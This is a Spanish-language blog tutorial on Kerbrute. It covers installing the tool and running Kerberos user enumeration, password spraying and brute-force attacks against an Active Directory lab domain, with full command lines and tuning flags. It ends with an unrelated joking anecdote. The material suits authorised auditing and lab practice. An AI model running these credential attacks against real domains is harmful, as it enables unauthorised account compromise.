Kerbrute: Guía Completa para Descargar, Configurar y Usar esta Herramienta de Fuerza Bruta para Auditar Kerberos

Kerbrute es una poderosa herramienta para la enumeración de usuarios y ataques de autenticación en Active Directory a través del protocolo Kerberos. En esta guía, aprenderás cómo descargarla, instalarla y utilizarla en diferentes escenarios.

🐺​¿Qué es Kerbrute y para qué sirve?

Kerbrute es una herramienta de código abierto escrita en Go por ropnop que permite:
Enumeración de usuarios en un dominio Active Directory.
Ataques de fuerza bruta contra contraseñas de usuarios.
Password Spraying para probar una contraseña en múltiples cuentas sin generar bloqueos masivos.

🔺​Cómo descargar e instalar Kerbrute

Para obtener Kerbrute, puedes descargar el binario precompilado desde su repositorio en GitHub:

wget https://github.com/ropnop/kerbrute/releases/latest/download/kerbrute_linux_amd64
chmod +x kerbrute_linux_amd64

Si quieres compilarlo desde el código fuente:

git clone https://github.com/ropnop/kerbrute.git
cd kerbrute
go build

Ahora ya puedes ejecutar kerbrute.

Modos de uso de Kerbrute

🔺​Enumeración de usuarios (User Enumeration)

La enumeración de usuarios nos permite identificar qué cuentas existen en un dominio de Active Directory.

./kerbrute_linux_amd64 userenum -d spookysec.local –dc 10.10.47.59 userlist.txt

Explicación:

  • userenum → Modo de enumeración de usuarios.
  • -d spookysec.local → Dominio objetivo.
  • –dc 10.10.47.59 → IP del Controlador de Dominio.
  • userlist.txt → Lista de usuarios a probar.

Si un usuario existe, el servidor responderá de manera diferente a si no existe, lo que nos permitirá identificar cuentas válidas.

Aquí te muestro un ejemplo en video:

🔺​Password Spraying (ataque de contraseña única a múltiples usuarios)

Este ataque es útil para probar una sola contraseña en múltiples usuarios y evitar bloqueos de cuentas:

./kerbrute_linux_amd64 passwordspray -d spookysec.local –dc 10.10.47.59 userlist.txt -p «Password123»

Explicación:

  • passwordspray → Modo de ataque de contraseña única.
  • -p «Password123» → Contraseña que queremos probar.

Este método es más sigiloso que un ataque de fuerza bruta tradicional.

🔺​Ataque de fuerza bruta completo

Si queremos probar múltiples combinaciones de usuarios y contraseñas, usamos bruteforce.

Error común: Este modo no acepta dos archivos (usuarios y contraseñas separados). Debemos combinar los datos en un solo archivo:

paste -d ‘:’ userlist.txt passwordlist.txt > user_pass.txt

Ejecutamos el ataque:

./kerbrute_linux_amd64 bruteforce -d spookysec.local –dc 10.10.47.59 user_pass.txt

Explicación:

  • bruteforce → Prueba todas las combinaciones de usuario:contraseña.
  • user_pass.txt → Archivo con formato usuario:contraseña en cada línea.

🔺​Opciones avanzadas de Kerbrute

Podemos optimizar el rendimiento del escaneo usando estos parámetros:

Aumentar la velocidad con más hilos:

./kerbrute_linux_amd64 userenum -d spookysec.local –dc 10.10.47.59 userlist.txt –threads 15

Guardar resultados en un archivo:

./kerbrute_linux_amd64 passwordspray -d spookysec.local –dc 10.10.47.59 userlist.txt -p «Password123» –output resultados.txt

Modo silencioso (menos logs en pantalla):

./kerbrute_linux_amd64 bruteforce -d spookysec.local –dc 10.10.47.59 user_pass.txt –quiet

Conclusiones

Me gustaría decir, que esta herramienta me ha hecho «la vida mas fácil» hablando de directorios activos, también tenéis una versión en Python con diferentes opciones nuevas a está, espero que os haya gustado el post.

Mira que majo el bicho de abajo si es que es un tío cojonudo no se mete con nadie va a la suya y tiene un corazón enorme. De hecho yo iba mal económicamente y este pedazo de capullo me dijo: tío se que te va mal y estas buscando pillarte un piso, pues no te preocupes yo te pago la entrada y ya me lo darás cuándo puedas.

Aun se me saltan las lagrimas a día de hoy. Comparte este post para que mas gente conozca la historia de este gran simio.